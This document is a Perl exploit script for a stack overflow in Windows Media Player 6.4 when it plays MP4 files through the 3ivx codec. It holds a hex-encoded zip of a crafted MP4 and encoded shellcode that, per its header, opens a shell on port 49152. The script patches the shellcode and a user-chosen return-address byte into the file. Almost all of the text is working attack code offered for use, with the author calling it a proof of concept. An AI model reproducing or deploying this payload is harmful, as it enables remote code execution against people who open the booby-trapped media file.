#!/bin/perl
#
# Windows media player 6.4 MP4 Stack Overflow
# 
# 0-day discovered and exploited by SYS 49152
# 
# Tested on win XP SP2 ENG
# Shell on port 49152
# 
# usage:
# - download this codec in order to manage MP4 content:
#   http://www.3ivx.com/coral/3ivx_d4_451_win.exe
# 
# - open the MP4 file with mplayer2.exe 
# 
# SYS 49152
# gforce(put the @ here)operamail(put the . here)com
#
# update:
# the latest 5.0.1 codec is still vulnerable


use Archive::Zip qw( :ERROR_CODES :CONSTANTS ); 

$zip_data = # code 724982
"x50x4Bx03x04x14x00x00x00x08x00x56xACx3Fx36xC5".
"xE1x2Ex98x9Ax0Ax00x00x5CxC2x01x00x1Ex00x00x00".
"x53x59x53x5Fx34x39x31x35x32x5Fx4Dx50x34x5Fx66".
"x6Fx72x5Fx6Dx70x6Cx61x79x65x72x32x2Ex6Dx70x34".
"xEDxD7x0Bx70x54xD5x19x07xF0xB3x9Bx8Dx80x10x26".
"x55x21x6Ax29x46x40x4Dx7DxA4x9Bx4DxC8x83xA1x1A".
"x62x72x49xD1x00x05x12x23x89x81x65x77x21xCBx66".
"xB3xC9xEExE6x85x80x81x28x06x8Cx96x47x78x09xD4".
"xA0xA0xC4x32x3ExA0x15x47xA7x45xC6x22xA6x2Ax56".
"xADxF5xD1x8Ax15x15xA5x5Ax85x98x89x05x5FxFDx4E".
"xEEx7FxDDx55x47x4Bx47xC7x8ExFAxFFxE9xC7x39xBB".
"xF7xDExF3xF8xCExBDxE7x66x95x52xC9xB3xC3x4Dx35".
"x45x19xE3x92x95xD0xA5xBFx26xC3xE1x0Dx05xFCxFA".
"xB3xB2x74x25xF9x03x81x7AxA9x55xF9xEBx2BxDDxFA".
"xABxDDx25x3Fx39xB6xA7x72xFAx21xA5xACxA5x4Ax9D".
"xB7x58x59x94xFEx3FxEAx33x1FxBExF8x39x57x7Dx25".
"xABx52x09x1DxE1xA0xD3x27xF5xF2xB0xAFxAFxCFx7E".
"xBAxCFxDDx25xC3x2DxD1xD6xA4xDFxCFx77xF1x3FxF5".
"x9Bx30xD6xEFxF6x3AxA5x92xECx77x47xE7x65xF6xB1".
"x3Dx5Fx0Dx2Cx55xC5x7FxECx3BxF1xECx4Ax77x55x30".
"x72x55x28x50x57xFDxB9x5Ex06xBDxE7xF7x56xCFx96".
"x4Ax62xC8x6Fx36x04xA3xDCxE6xF7xC3xDCx41xCFxEC".
"x98x21x0DxAAx0Bx56x25x9BxF5x41xBBx42xE1x59x55".
"x52x9Fx13x0Ax87xDCx31xE7x5Cx21x8BxE0xFCxC2x34".
"xACx2Ax51x17x32x3Cx2DxDDx13x72x87x74x25xAExB9".
"xB9x79x84x94x36x29x4FxCBx1DxA2xACx43x95x75xEC".
"x36x65xE9x7Ex2Cx5ExBExB1x9Ex92x78x92x14x16xC9".
"xABx3Ax3Dx14x0Ex87xA2xCDx5AxFFx2Ax17xE9x7Ax8A".
"x74xEFxFAxB4x13xB3xCBx21x28x47xEAx21x9BxF5x81".
"x55x72xDExBCxE8x0CxF5xF5xAAxDFxB7x14x4FxC8x10".
"x3Ex94x78x4Fx42xD7x77x4AxFCx45x62xBBx44xB3x84".
"xACx91x65x09x8Ex6Dx91xB8x43xE2x5Ex89x0Dx38x77".
"x9Dx84xDCxB3x16x19xBFxE5x16x89x36x89x3Bx25x24".
"xCDx96xF9x12x4FxE2xF3xAFx24x36x22x9Ex95x78x59".
"x62x81xC4xEFx25xCAx25x66x49xECx42x9FxB2xACx96".
"x22x89xB5x12xF2x8Cx58xF6xA1x7Ex2DxEAxCBx25xEE".
"x96x58x23x21xF9xB5xDCx24x51x23x51x68xF6x6Fx3D".
"x59xCAx26x89xA9x12x25x68x2Bx5Dx62xA9x84x17xE7".
"xD6x49x84x25x0Cx89x3Dx38xFFx25x89xD7xF0xFDxE5".
"x12x73x10x41x94xF3x62x4Ax37xDAxD1xE3xBEx46xC2".
"x83xF3xF4xFCx57x20x16x49xDCx2CxB1x43xE2x3AxC4".
"x0Ax8CxBBx1DxB9x5Cx87xFAx6Fx70xAExCExC7xABx12".
"xC7x31xC7x95x98x9Fx1Fx79x89xE4x4Ax8Fx73x31xAE".
"xFDx2DxCAxDFx49xBCx2Dx71x40x62x35xC6x37x37x66".
"x2Dx1Fx91x78x00xF9x0Fx62x8Dx1Ex96x98x89xF6xAB".
"x91xEFx0DxC8x53x03xD6x5ExB7x7DxB5xC4x2AxE4xE9".
"xEFx12xFFxC4x5Ax2ExC5x38xF4xFAx36x4Ax74x4Ax5C".
"x8FxF3x57x60x0Ex95x18x87x07xD7xD7x21x87xDExCF".
"xCDx4BxF6x26x4BxABx44x87xC4x36x94xFAxBAx85x38".
"xBFx1Ax9Fx67x63x6CxB5x68xB3x4BxE2x6Fx18xC7x22".
"xF4x1Fx42xBEx97x21x5Fx3ExACx59x10xEDx34x63xDD".
"xE6xE0xBAx6Bx31x57x7Dx6Fx3FxADxCCx7Bx79x31x72".
"x7Fx0Dx42x5Fx13xC6xBCx17xA0xFDxF9x68x57x1FxDF".
"xAFxCCx67xE1x6DxCCx2Bx88xF3x3Dx18x73x08x7DxEB".
"x3ExCBxF0xBDx5Cx2Bx1Bx8BxB9x5Ex0Bx31xBFxCAx98".
"x73xCBx70x7Ex1Dx72x3Ax2Fx66xACxF3x51x5Fx8AxCF".
"x7Ax9DxEFx97xB8x15x63x5Cx8DxB9xE8xF1x5Cx85x6B".
"xFFx85x75x9Cx87xF5xD2xF7x4Ax40x99xCFx91x07x39".
"xBDx3Ax66x7Ex3Ax97x1BxD0x57x18x39xD0xF7xD0xAB".
"x38xB7x16x6BxF1x9Cx32xEFxE7x76xE4x4CxDFx23x2B".
"x91xFBx46xCCxC9x17x73x4Dx13xFAxF3xE1x7Cx7DxAE".
"x7Ex4Ex6Ex97xB8x51x99xF7xCEx53x98x8Fx1Ex83xDE".
"x43x1Ex54xE6x33xA2xEFxB1x16x89x83x98x6Bx15x72".
"x1DxC0xBCxD6x61x3Dx36x21x07x0Dx18xFBx5ExB4xF3".
"x3CxD6x76x21xE6xA8xD7xBAx15xE3x8Ax3CxCFx8Fx23".
"xFFx0DxC8xFFx2Cx94x7ExCCxC7x8DxB1xD7x60x6Ex01".
"x44x4DxCCx5Ax5Fx89xF5x69xC0x18x9Bx50xDFx86xF1".
"x2FxC7xBCx75x3BxF7x49x4CxC6xDCxDDxC8xE3x38x8C".
"x77x22xD6xF8x12xE4xEAx5Ex7Cx97xA3xCCx67x44xEF".
"xC3x3Fx97xB8x58xE2x1Ex89x6CxB4xAFxE7x5Fx8Cx75".
"xD1x73x2Ax45x2Ex2Bx70xBEx5Ex7Bx2FxE6x96xA9xCC".
"x7Bx26x13xF9xE8xC1x3Ax1BxC8x43xAExC4x74x89x11".
"x18x9BxCEx67x0AxFAx5Fx8Ex7CxEAx3Dx56xDFx1Fx6B".
"x90xCBxB9xB8xB6x16x39xD3xB9x99x81xEFx9Bx90x73".
"xBDx6ExFAxDEx6Ax43x79x0ExD6x58xD7xFFx8Cx5CxBC".
"xA3xCCx7DxBFx16xF9x7Cx04x79xD8xAAxCCx3DxCCx8D".
"xBCx36xC5xACxEBx2BxC8xB9xBExC7x66xAAxE8x9Ex51".
"x83x35xD4xFBx55x81x32xF7x3Bx3FxAExD3xC7x17xE1".
"xBBx1BxD1x97x8Ex51xF2x9ExFCx40xCAx91xC8x81xCE".
"x91x43x22x49xA2x3FxC6xE0xC1x75x37x63x9Cx8FxCA".
"x73x6Dx41xFExF4x7DxA3xF7x21x7Dx4Fx2DxC1x5Ax36".
"x23x27x3Ax77x01xF4xB7x18x9Fx17x22xAFxFAx39xBC".
"x12x6Dx57xA2x5CxA4xA2x7Bx4Ax64x4FxBAx1Ex75x2F".
"xC6x57xA9xA2xF7x9AxCExF5x24xE4x7Dx26xD6x7Ax06".
"x8Ex4FxC4xE7xC8x3Ex5Ax87x5CxFAxD1x46x0BxDAxD4".
"x6BxA8xDFx47x67x49xE4xA1x3DxFDx4Ex8DxC3x1CxF4".
"xFDxFCx2ExF2xA3xF3xACxF7x8Ex72xB4xA7xEFx6DxBD".
"xF7xBCxA8xCCxF7x53x21xDAx98x80xF9x85xB0xD6xB3".
"x55x74xEFxB9x09xDFxB7xAAxE8xFEx3Dx17xB9xB9x01".
"xE3xAAxC3xB1x05x98x4Fx33xF2x77x0DxAExF3xA1xAD".
"xC5x2AxFAxECxEAx3DxEEx3Ax15xDDx67x1BxB1x1ExEB".
"x71x5Dx0BxBExD3x7BxCFx26xACx7DxE4xEFx9Ax6Ax8C".
"xABx59x45xEFx5Dx7Dx2Fx05x91x23x1Dx57x60x3Cx7E".
"xC4xD5x2AxBAx2Fx35x62x8Ex01xF4x35x13xEBx73x05".
"xD6xD8xA7xA2xEFx09xBFx8AxEExC9x57x61x0Ex01xCC".
"xC1x83xE3xB1xF7x42x23xFAx5Fx1Cx33xF7xF9x18x4B".
"x10xE3x95xE7x4Bx1DxC7x98xCAx90xBFx46xF5xE9x5E".
"xA6x7Ax91x4Fx7DxFFxEAxFBx59xEFx9BxFAx5Ex5Ax83".
"x6Bx22xCFxAFx0Fx63x89x3CxDFx2DxC8xEFx92x98x39".
"xD6x23x77x91xB5x5Dx8Ax71x84xD0x47xE4x3Dx1DxD9".
"xA3x6ExC6xF5x7Ax6Dx6ExC7xB8x17x20xD7xBAx9DxC8".
"xFBx3CxF2x37x65xECxFBxB1x09xFDx96xA3xAEx73x54".
"x85xF6x9Bx90xABx06xACxB9x7Cx56x1Bx43x61x57x00".
"x7Fx68x8Fx94x3Fx1Dx2Ex91x78x5AxFEx9CxCAx55xD6".
"x93x12x94xF5x9Cx63xCAx9Ax7Fx40x59x3Dx15xCAx7A".
"x7DxABxB2x6Ex2Bx54xD6x47xADxCAxFAxC6x11x15xD7".
"x6FxB3x8Ax3BxEFx80x8Ax1Bx7Fx83x8AxABx1CxABxE2".
"x5AxD7xA9xB8x3Bx2Fx57x71x7FxBAx43xC5x1DxBEx50".
"xD9xFAx1Dx53xB6x73xFFxADx6CxF9x0Fx2Bx9BxA7xBF".
"xB2x5Dx9BxA8x6Cx9Bx8Bx95xEDxA1x6Ax65x7BxA9x5B".
"xD9x3Ex2Cx54xF1x67xBExA9xE2xC7xA4xA9xF8xD2x37".
"x54x7CxFDx0Ex15xDFxDExA6xE2x77x96xA8xF8xA7x5F".
"x96xD7x5Bx5Cx9Dx3BxECx94x6DxF7x03xBFx27x1CxF9".
"x99xF2x99xDFx49xF2xDBx2AxE8xACxA9xA9x8AxFEx56".
"xB0xECx3CxECx95x9Fx0FxF2x4Ex78xA0xB3xDAxE9x97".
"x72x87xDBxD9x77x71xDFxEFx9Bx49xF5x9Ex60xB8x2E".
"xE8x49x73xA4x67x8CxCExCCxCAxCExB1x3Bx43xF1x56".
"x8Bx71x91xC5x62x14x1AxCDxB9x86xFExAFx79x99x59".
"x34x9BxC5x30xB3xB0x99xC5x40xB3xE8x2ExF8xFAx72".
"x0Bx26x17x94x15xE4x5ExDAxFFx58xB8xF5xADx0BxBA".
"x5Ax0ExDFxF3xC2x3Bx2Fx84x47xF5x94x2Dx0Ax9DxFA".
"xC8xF4x8Dx9Bx5BxDExFAxF0x60xCFx18x7BxC3xDBxA9".
"xB7xB9x2Ax72xC6x24x3Dx71x70x61xD2x6BxC7x9FxFA".
"xC7x96x3Fx94x85xCEx5Fx9Ax97xF4xF1xA1xB2x86x37".
"x8BxAAx93x3Ax52x7CxE5xD9x73x0Fx94x3FxBBx67x43".
"xC9xF6x7DxEBx1Ax8Ax3Fx1Ax7CxFFxD2x9DxBBx93x3E".
"x3Ex58xD6xB0xAFxA8xE4xB9xF3xD7x1Bx9Bx26xECxAD".
"x4Fx4AxB9x73x61xF3x43xF1xBExF1x7Bx8BxCExD8x7E".
"xFEx92x92xA4xA7x5Ex7Cx3FxE9x95xFDxB6x9Ex9FxB5".
"x4ExABx39x9AxD3x76xBCxBBxC3x71xF7xAAxBBx2Ex7A".
"x77xD5xFAxC1xAExDAxBBx56xD4x5ExF5xD1xC9xAEx86".
"xF5xCFx34xEDx1BxBFxABxFDxB6x55xF6x5Fx57x0Cx75".
"x14x6Cx4Bx7FxFFxB1x8AxC4x01x4Fx76xAFx1ExF0x72".
"xF7x75x03x5CxB5x1Dx8ExF2xCDx1Dx03x86xE4x4Ex75".
"x64x3Fx78xDFx26x39x66x6Fx3BxB2x6AxEBxE5x5DxB3".
"xDExDFx51xB8x62xEBx84x6Ex5Dx1Fx79xEAx99x6Fx4A".
"xFDxE8xCAxC1x5Dx15x43xBBx7Ax8CxDDx1Bx5FxEFxCD".
"x69x93xFAxD8xDExBDx1Dx8Ex4Fx1Ex9FxB4xBBxF7xE8".
"x2DxA1xC9x29x67xDBx9Fx4Fx19xE5x2Bx9Fx52xB5xE5".
"x40x5BxF6xE9xF7x38x2Ex4BxDEx72xB2xFFx68xCFx33".
"xD9x87x97x55xECx1CxEEx6AxD8x94xB0xFFxC8xDAx81".
"xBDx1Dx6Bx07x76x1DxC9x59xD6x33xE8xACx19x53xBA".
"x73xDAx7Ax2Bx72xFCxAExDAxA2x84x99x23xACx17xBB".
"x1AxDAxA5xBFx9FxB6xCFxDFxB3x7AxEBx84x8AxA1x92".
"xC4x61xDFxC0x42x7DxB3x0Cx22xA2xEFx84x5CxE3xEE".
"xFDx46x89x51x6AxC4x0Fx30x5Fx93x93x8Dx32x23x3E".
"xD1xACxCBx8BxF0x13xF9xA7xD0x30x5Fx9Cx85x5Fx1A".
"xB6x2Fx3Bx30xD5xB0x95xBEx6Ax5Cx6Ax5CxF6x75xE2".
"xD0xA1x43x27x32x95x13x3Ax89x88xBExBBx0AxB5xFF".
"xF7x20x88x88x88x88x88xE8x7BxA9x98x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88xE8x87".
"xA0x94x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88xBEx57x8Ax89x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x7E".
"x38x66x12x11x11x11x11x11x11x11xD1x7Fx51x40xDF".
"x9Ex34xA5xD4xB9x9DxE3xA6x4Cx93x72xB8xDBx19x76".
"x4Ax69x91x50x93xBDxF3xE6x79x5DxCEx70x20xD9xF0".
"xD6x7BxE4x8BxE4x4Ex67xD5x2Cx29x4Fx8Fx3Dx6Bx52".
"xBDx27xE8x0Ex84xF4xF1x33xE7x54x07x75x79x0Ax8E".
"x9Bx06xEBx2BxC3x41x5Fx75xCCx95x11x16x95xD0x57".
"x0Ex77x7Bx43x3Ex29x87x7ExE1xB8xEEx63x58xA7xDB".
"xD9x24xE5x69xB1xFDx3AxECx76xBBx14x67xB8x6AxBC".
"x55x52xFEx08xC7x86x44x2ExCDxE9x0Cx07x02x52xA6".
"xC5x5ExE4x9Dx56x57xEDx09x25xD7x67xA4x66xA5xA6".
"xA5xA6xDBx2Fx4CxFEx65x9DxD7xE5x9BxE6xF5x7Bx92".
"x33x53x47xA7x3AxE4x9Cx5Bx2Fx12xBAx57xBFxC7xA9".
"xC7xACx5Cx01x7FxAAxB3xA6xA6xCAx93x6Ax5ExAEx47".
"x52xEDxF4x7Bx22x0Dx4Ex9Cx34xA5x48xAAx73x63x3B".
"x4AxB6xF7xC9xCAxF8x6Cx25x2DxD3x9Ex6Ex7Ex93x53".
"x60x37x2BxD9x19x38x27xCBxEExE8xABxA4x8FxCEx33".
"xCCx4Ax5Ax96x79x4Ex9Ax23x3Dx1Fx95xD1x19xD2x78".
"xD3x09x8CxF0xC7xB1x23xF4x84x66x5Cx9Ax9Fx9Fx37".
"xE3x17xF9xFAxD0x98xD8x81xA6xA5x5Fx60x14xE4x67".
"x66x67x39x8Cx82xBCxD1x79x0Ex23x2Fx23x2Fx7Bx5C".
"x46x5Ax66x46x76x81xC3x9Ex61x64x8ExCBxBBx20xC7".
"x9Ex9DxEDx90x8Ex4Fx7Ax7Dx76xD0x23x8DxFEx07x50".
"x4Bx01x02x14x00x14x00x00x00x08x00x56xACx3Fx36".
"xC5xE1x2Ex98x9Ax0Ax00x00x5CxC2x01x00x1Ex00x00".
"x00x00x00x00x00x00x00x20x00x00x00x00x00x00x00".
"x53x59x53x5Fx34x39x31x35x32x5Fx4Dx50x34x5Fx66".
"x6Fx72x5Fx6Dx70x6Cx61x79x65x72x32x2Ex6Dx70x34".
"x50x4Bx05x06x00x00x00x00x01x00x01x00x4Cx00x00".
"x00xD6x0Ax00x00x00x00";

my $shellcode = # code 724982
"x2BxC9x83xE9xB0xD9xEExD9x74x24xF4x5Bx81x73x13".
"xC6x5Ax9CxA1x83xEBxFCxE2xF4x3Ax30x77xECx2ExA3".
"x63x5Ex39x3Ax17xCDxE2x7Ex17xE4xFAxD1xE0xA4xBE".
"x5Bx73x2Ax89x42x17xFExE6x5Bx77xE8x4Dx6Ex17xA0".
"x28x6Bx5Cx38x6AxDEx5CxD5xC1x9Bx56xACxC7x98x77".
"x55xFDx0ExB8x89xB3xBFx17xFExE2x5Bx77xC7x4Dx56".
"xD7x2Ax99x46x9Dx4AxC5x76x17x28xAAx7Ex80xC0x05".
"x6Bx47xC5x4Dx19xACx2Ax86x56x17xD1xDAxF7x17xE1".
"xCEx04xF4x2Fx88x54x70xF1x39x8CxFAxF2xA0x32xAF".
"x93xAEx2DxEFx93x99x0Ex63x71xAEx91x71x5DxFDx0A".
"x63x77x99xD3x79xC7x47xB7x94xA3x93x30x9Ex5Ex16".
"x32x45xA8x33xF7xCBx5Ex10x09xCFxF2x95x09xDFxF2".
"x85x09x63x71xA0x32x5CxA1xA0x09x15x40x53x32x38".
"xBBxB6x9DxCBx5Ex10x30x8CxF0x93xA5x4CxC9x62xF7".
"xB2x48x91xA5x4AxF2x93xA5x4CxC9x23x13x1AxE8x91".
"xA5x4AxF1x92x0ExC9x5Ex16xC9xF4x46xBFx9CxE5xF6".
"x39x8CxC9x5Ex16x3CxF6xC5xA0x32xFFxCCx4FxBFxF6".
"xF1x9Fx73x50x28x21x30xD8x28x24x6Bx5Cx52x6CxA4".
"xDEx8Cx38x18xB0x32x4Bx20xA4x0Ax6DxF1xF4xD3x38".
"xE9x8Ax5ExB3x1Ex63x77x9Dx0DxCExF0x97x0BxF6xA0".
"x97x0BxC9xF0x39x8AxF4x0Cx1Fx5Fx52xF2x39x8CxF6".
"x5Ex39x6Dx63x71x4Dx0Dx60x22x02x3Ex63x77x94xA5".
"x4CxC9x29x94x7CxC1x95xA5x4Ax5Ex16x5Ax9CxA1";

open(code, ">tempzip.zip") || die "Can't Write temporary Filen";
binmode (code);
print code $zip_data;
close (code);
print "nTemporary file ready, patching..n";
my $zip = Archive::Zip->new();
$zip->read( 'tempzip.zip' ) ;
$zip->extractMember( 'SYS_49152_MP4_for_mplayer2.mp4' );
open(code, "+<SYS_49152_MP4_for_mplayer2.mp4") || die "Can't Open temporary Filen";
binmode (code);
seek code,3875,0;
print code $shellcode;
print "nShellcode added..n";
seek code,5566,0;
print "nChose a good return address:nThe right way would be to attach a debugger to mplayer2.exen";
print "and find the address of the pop edi, pop esi, retn sequenceninside 3ivx.dll, ";
print "to get the second byte, but usually a valuenbetween 0xC6, 0xED or 0xCE should work..n";
print  code chr(hex($a=<STDIN>));
print "nAddress added, have fun!n";
close (code);
#indeed this sploit could have been written better without the ret address hassle,
#but it's intended to be only a POC, not a weapon for kiddies..

# www.Syue.com [2007-12-08]